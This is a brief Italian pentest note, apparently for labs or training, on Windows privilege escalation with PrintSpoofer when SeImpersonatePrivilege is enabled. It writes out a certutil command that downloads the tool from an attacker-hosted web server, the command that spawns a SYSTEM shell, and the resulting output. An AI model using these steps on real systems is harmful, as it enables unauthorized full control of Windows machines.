tags: PrintSpoofer privilage_escalation SeImpersonatePrivilege
Se con il comando:
whoami /privAppare questo privilegio su enabled:
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
...
SeImpersonatePrivilege Impersonate a client after authentication Enabled Allora possiamo scaricarci il file PrintSpoofer.exe che ci permette di ottente privilegi NT-Authority con un semplice comando, il file .exe lo trovi a questo indirizzo
Una volta caricato sulla macchina vittima per esempio con i seguenti comandi:
#Sulla macchina attaccante
python3 -m http.server
#Sulla macchina vittima
certutil.exe -urlcache -split -f http://10.11.141.131:8000/PrintSpoofer64.exe C:\Windows\Temp\PrintSpoofer64.exe Una volta caricata ci basta eseguire il seguente comando per ottenere una shell NT-Authority:
C:\Windows\Temp> PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19613.1000]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32> whoami
nt authority\system